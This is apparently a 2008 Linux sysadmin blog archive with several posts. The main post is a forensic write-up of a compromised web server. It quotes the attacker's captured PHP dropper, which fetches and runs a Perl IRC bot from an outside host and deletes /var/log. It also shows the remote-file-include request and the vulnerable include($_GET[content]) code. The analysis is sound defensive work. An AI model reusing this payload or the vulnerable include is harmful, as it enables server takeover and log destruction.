mailNewRecordings: Script for reporting Dreambox recordings

March 28, 2008

I’ve written a small script which reports the recordings of my Dreambox 500 receiver (with a Gemini image), which writes its data onto my Linux file server, via email. This is important as I’ve configured the Dreambox to record automatically some series. The script can be run on the file server (as in my case) or on the Dreambox (if it has python installed). It is configurable via an ini-file and reports the new recordings including the description text provided by the EPG during the recording. A summary of all stored recordings is added at the bottom of the mail. The mail also includes the amount of space used by the recordings and the available storage space. Call the script via cron once a day. Ah, and here is the link to the script: mailNewRecordings-0.1.tar.bz2

A tale of searching for a hacker and his supporter, the idiot programmer

March 14, 2008

Some days ago a friend called me, one of his web servers had a spike in the traffic monitoring of the router. Over 2GB in one hour was not normal for this server and he asked me to take a look, which I did and which was the start of a journey. The first command I executed after login was top which reported following:

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
17448 www-data 25 0 48580 33m 5876 R 24 2.4 380:07.76 apache2
3117 www-data 25 0 6232 4392 1424 R 23 0.3 932:05.18 perl
3105 www-data 25 0 6232 4240 1272 S 19 0.3 687:54.80 perl
17447 www-data 25 0 44804 30m 5804 R 13 2.2 357:28.33 apache2

that did not look normal. I asked my friend if he is using perl on the webserver. He told me only for awstats but he uses the version which comes with the distribution and should be therefore up to date. When I did take a look with ps aux I could not find the perl process, the process with the same pid as above had the “name” /usr/sbin/apache2 -k start -DSSL, which was also the output of cat /proc/3117/cmdline. I wanted to know who the parent process was so I did following:

ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm

Which showed the correct process name but which also showed that init (pid 1) was the was the parent process which could not be possible: Now that looked really bogus and I did a netstat -anp which showed me following:

tcp 0 0 88.xxx.xxx.xxx:57350 194.109.20.90:6666 ESTABLISHED3105/apache2 -k sta

A telnet 194.109.20.90:6666 showed me that this was a normal IRC server from the undernet.org network. Now I was sure that someone hacked the machine of my friend. I started my search for files which the attacker had created with following command:

touch -d "10 march 2008 20:00:00" date_marker
find / -newer date_marker > long_list.txt

I walked with my friend through the results but there were no files which where created by the attacker, so it seams the attacker knew at least some techniques to hide his traces. The apache logfiles didn’t help either, as I didn’t know when the infections took place and via which of the > 40 vhosts (some used by customers to upload there own stuff), which generated many entries even in the error log. I made also sure that no system files had been changed/replaced and I’m quite sure now that the attacker stayed with within the www-data user. So I did a restart of the server and could confirm that that the system was clean again and that I could look how long it would take for a reinfection. It was now already late in the night, as I got called in the evening, and I started a tcpdump on all non standard ports before I went to bed.

On the next day the system was infected again but now I had only 12h hours to cover. I downloaded the tcpdump raw packets file to my notebook and took a look with it with Wireshark. I went looking for port 6665 to 6669 at first and as I guest that the first connection attempt is also the infection time, I knew now the time. I got the time but I also got more – the complete IRC data the bot uses to connect and wait for his master:

IRC network: undernet.org
Channel: #vx.
Channel password: .BushMaster.

A look into the channel showed that only 30 nicks where present in that channel but that more than one operator was there which where searching for new victims in a systematic way as every 10-20 minutes a new nick joint. But this is an other story for an other post (maybe).

I knew now the infection time and found something in the apache error log, just between the log entries:

[Thu Mar 13 04:14:13 2008] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/xxxxxxxx/robots.txt
[Thu Mar 13 04:18:51 2008] [error] [client xxx.xxx.xxx.xxx] Negotiation: discovered file(s) matching request: xxxxxxxxxxxxx (None could be negotiated).
--04:20:17-- http://www.wolffilm.de/s.txt
=> `s.txt'
Resolving www.wolffilm.de... 217.160.103.90
Connecting to www.wolffilm.de|217.160.103.90|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104,328 (102K) [text/plain]
0K .......... .......... .......... .......... .......... 49% 1.14 MB/s
50K .......... .......... .......... .......... .......... 98% 3.75 MB/s
100K . 100% 21.89 MB/s
04:20:17 (1.78 MB/s) - `s.txt' saved [104328/104328]

I tried at once to download that file, but it was not there anymore. I searched for the file on the web server it was also not there. I started a search for any other wget entries in the apache error log and did find one before – the original infection.

But what now, the systems was setup in a way that I didn’t have all logfiles in one place and they were also not complete and really usable. And with > 40 vhosts it would take ages so I decided to do a full tcpdump of all traffic which goes to and from the server after a restart to monitor the reinfection. I looked with

ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm | grep perl

every some hours to check if a reinfection has already happened, if not I restarted tcpdump to reset the raw packet file. After I came back from the monthly LUGT meeting (linux user group tirol) the system was infected again and I got >6gb of tcpdump trace. But now I knew what to look for, the wget entries. I found them at Thu Mar 13 21:34:42 2008. I used tcpslice to extract the time frame which was interesting for me.

tcpslice -w attack.raw 2008y3m13d21h30m +600 dump-02.raw

After downloading the file onto my poor and old notebook I searched in Wireshark for the same time stamp and I found the break in:

GET /pages.php?content=http://www.flying-swan.de/s? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxx.xxxx
User-Agent: libwww-perl/5.805

which generated following action by the webserver:

GET /s?.php HTTP/1.0
Host: www.flying-swan.de

HTTP/1.1 200 OK
Date: Thu, 13 Mar 2008 20:33:12 GMT
Server: Apache/1.3.34 Ben-SSL/1.55
Last-Modified: Thu, 13 Mar 2008 20:30:15 GMT
ETag: "930958-119a-47d98ed7"
Accept-Ranges: bytes
Content-Length: 4506
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

<?
exec("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
popen("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
proc_open("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
shell_exec("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
system("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
passthru("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
popen("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd", "r");
proc_open("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd", "r");
unlink("/tmp/sess_e00dd4lbo2ad2758n9fc641e47cd76x9");
unlink("s.txt");
unlink("s.txt*");
unlink(".bash_history");
?>

which than downloaded the perl script I attached here … It is worthwhile a look. After all this work I was curious how the php script looked which as used for gaining access to the server. Lets take a look at the interesting parts of the page.php file:

<!--Fireworks 8 Dreamweaver 8 target. Created Tue Dec 18 21:07:03 GMT+0100 2007--<
....
<td height="21" colspan="2" bgcolor="#C9CACC">   <a href="./">Home</a> | <a href="pages.php?content=info">Information</a> | <a href="pages.php?content=progr">Programm</a> | <a href="pages.php?content=anmeld">Anmeldung</a> </td>

and finally:

<?php include($_GET[content].".php");?>

Argh .. I’m going to kill this idiot programmer … who is that damn stupid still in 2008? I can’t believe it – how can someone like this call himself programmer. I deactivated the whole website and I told my friend that he should send the programmer an invoice for my hours I needed to trace this down to something like this stupid. Thats want I can call only wantonly negligent and I need also to talk to my friend about the security of his web server, but I believe that this was opened due request by the idiot .. ah sorry … programmer.

Amazon MP3 with Linux downloader

March 4, 2008

I don’t really know why a special client program is necessary in the first place but still it is time to celebrate a little bit. Amazon has announced the beta version, which still has the full functionality, of a Linux client for their music download portal. The software is provided as binary packages for Ubuntu 7.10, Debian 4.0, Fedora 8 and OpenSUSE 10.3 (Sorry no source available). The music itself is DRM free and provided as high quality MP3 files.

It seems that Linux is now getting more awareness in the desktop field which is good. But I still don’t understand why Amazon does not an AJAX enhanced web site as their competence lies in that area. What I would like to see is an open API for accessing the portal/music so it could be integrated into Amarok or similar open source programs.

Disk encryption broken due cooled memory

February 22, 2008

The hard disk and file encryption Systems Bitlocker (Vista), dm-crypt, TrueCrypt and Apples FileVault were previously known to be save. This is no longer the case! Researchers from the Princeton University published in their blog a video showing how to extract the password stored in the memory. The attack vector is in this case the DRAM, which does not lose the state after a power cut. It takes some seconds or even minutes, by cooling the memory (-50°C) this can be extended even further.

The researcher boot than a mini program which dumps the memory onto a USB hard disk. A second program searches in this dump than for the password. Take a look at the video it is really well done!

flash_movie

My first thought to be at least a little bit secure is not use the standby modus but to switch off the computer completely. This at least limits the opportunity for an attacker to a few minutes. But this is not a solution. A solution would be a special RAM for storing the password which clears the memory when the power is cut. This could be done by a capacitor which provides enough power to clear the memory.

Has someone a better/other idea?

Script for deleting files older than x days

February 16, 2008

I’m operating some mail servers, where I’m running two different virus scanner. The first one is engaged during the SMTP handshake and rejects malicious mails. The second one is invoked before the maildrop filter. If this one detects a malware the attachment is removed from the mail and which is stored in a quarantine directory. The user is informed about the removal in this case so he can write me a mail if wants this file – but most user will never ask for the files, so I needed a script which deletes all files in the quarantine directory which are older than the configured days.

delete_old_files.py is this script, which I call by crond like this:


# m h dom mon dow command
23 23 * * * /usr/local/sbin/delete_old_files.py /var/quarantine/ 30

This script is a general purpose script which should also be helpful in other scenarios.

iptables firewall scripts updated

February 12, 2008

I’ve just moved my iptables firewall scripts from the old server to my blog and I updated the scripts with some new tricks I learned in the last years. I’ve have (modified) versions of these scripts running on all of my servers, as it provides an easy starting point which saves much time. The rules are easy enough to understand and change and I’m not a fan of complicated iptables rules you won’t understand without a special GUI. If something is so complex it will have wholes in it! I hope with this scripts you will see that iptables is not complicated. Have fund and be secure.

Ubuntu grows into the Enterprise

February 11, 2008

Matt Asay writes about an Alfresco’s Open Source Barometer survey which shows that Ubuntu is the fastest-growing Linux distribution. I won’t repeat the exact values here – read the original blog entry.
What I want to talk about it is that normally (K)Ubuntu is thought to be strong in the end-user desktop market, but Alfresco has mostly enterprise customers, which leads to the conclusion that Ubuntu has also an impact on enterprise level. I’ve started deploying Ubuntu Servers side by side with Debian on servers and specially on desktops with the first Ubuntu LTS release, but I thought thats just me. But it seems I was wrong – some other guys are also installing it the enterprise ;-).

I like that move as Ubuntu provides the same distribution for free and with a support contract. With RHEL I need to choose a clone like Centos, which at least in the past did not provide every package RHEL provided, for some less important servers. With Ubuntu I can use the same setup and maintenance process for all of my servers and that is specially important as I use OpenVZ a lot, which leads to many installed Ubuntu systems. Now I only hope that even more Linux systems get deployed in the enterprise and that Ubuntu takes a fair share of that piece of the market.

Backup of Appliances: Login and Download

February 5, 2008

I have sometimes the problem that I want to backup a device which has only a web interface (e.g. an appliance). Most of them provide a possibility for this, after a successful login you need only to click in the browser onto the backup link/button to get a file with the backup. So why I’m writing a whole post about this topic?

It is because I don’t want to do it by myself, I want it automatically done every night – now it is not that trivial anymore. Why should I want a backup every night? You say, I just could make a backup every time I change something. I don’t think that this is a good idea, beside that I’m too lazy for this.

I use normally cURL for this task, which I will illustrate with a backup script for a Vlines appliance (an Asterisk server appliance). Take a look at the source:


#!/bin/bash
url=https://xxx.xxx.xxx.xxx
cookieFile=/tmp/vlines_cookie.jar
configFile=accessvoip.vlines
#-----------
curl -d "username=XXX&passwort=XXXX" -c $cookieFile $url/index.php
curl -s -S -b $cookieFile $url/save.php > $configFile
curl -s -S -b $cookieFile $url/logout.php
rm $cookieFile

As you see, it is really easy. cURL has the ability to store cookies which is used by this appliance to store a user session and the login credentials are provided as parameters to the server. After a successful login we just want to get the backup file and log out.

As you see I use a fixed filename for storage – this is because this script is called by rsnapshot which does compare the output of the script with the last run and provides hardlink based snapshots. rsnapshot also sends me a mail if anything within the script provided an output (= indicating an error).

This script should be easily adapted to your device/appliance like access point, router, environment monitor, …. have fund and be secure.

ovpnCNcheck — an OpenVPN tls-verify script

February 2, 2008

If you’ve running an OpenVPN server you may have asked yourself how you can decide which clients can connect even if they got signed by the same CA. A common case would arises if you provide more than one OpenVPN server but not all clients should be able to connect to every one. Sure it would be possible to use a separate CA for each server but that would not be flexible. The clients would need more than one certificate/key pair and if you want to enable/disable access to a certain server for a client you need to generate/revoke the client certificate. Not a good idea!

I’ve therefore written two scripts with solve this problem. These scripts check if the peer is in the allowed user list by checking the CN (common name) of the X.509 certificate against a provided text file. For example in OpenVPN, you could use the directive:

tls-verify "/usr/local/sbin/ovpnCNcheck.py /etc/openvpn/userlist.txt"

This would cause the connection to be dropped unless the client common name is within the userlist.txt. The bash script will just check if a common name is in one of the lines (one CN per line) and the python version parses the provided regular expressions. Every line should hold one regular expression in this case which can also be just one common name (don’t forget to escape stuff like .?^()[]\ with a \). Empty lines or ones which start with a # are ignored. The bash version works also on a “out of the box” OpenWRT installation.

Python version: ovpncncheck.py
Bash version: ovpncncheck.sh

Hope it helps you!

How to mark mails as read/seen at delivery with the courier maildrop filter?

January 30, 2008

There is no clean way to do this, but I stilled needed to do it so I wrote this hack. Use it at your own risk. I’m using it for the spam mails I get, which have been marked by spam assassin. This mails should be delivered into the Junk folder and be marked as read so only new ham messages are counted/shown if I open my mailbox.

Download the markasseen.py script to /usr/local/sbin/ and set the executable flag. Now you only need to write following into the wished ~/.mailfilter file:


# filter spam mails and mark them as read
if ((/^X-Spam-Flag:.*YES/))
{
  cc "./Maildir/.Junk/."
  JUNK=`/usr/local/sbin/markAsSeen.py "./Maildir/.Junk/."`
  exit
}

Important: This script is only safe to use if all messages in a given folder should be marked as read!!

If you’ve a better way to mark messages as read on delivery tell me!

Powered by WordPress
Entries and comments feeds. Valid XHTML and CSS. 34 queries. 0.057 seconds.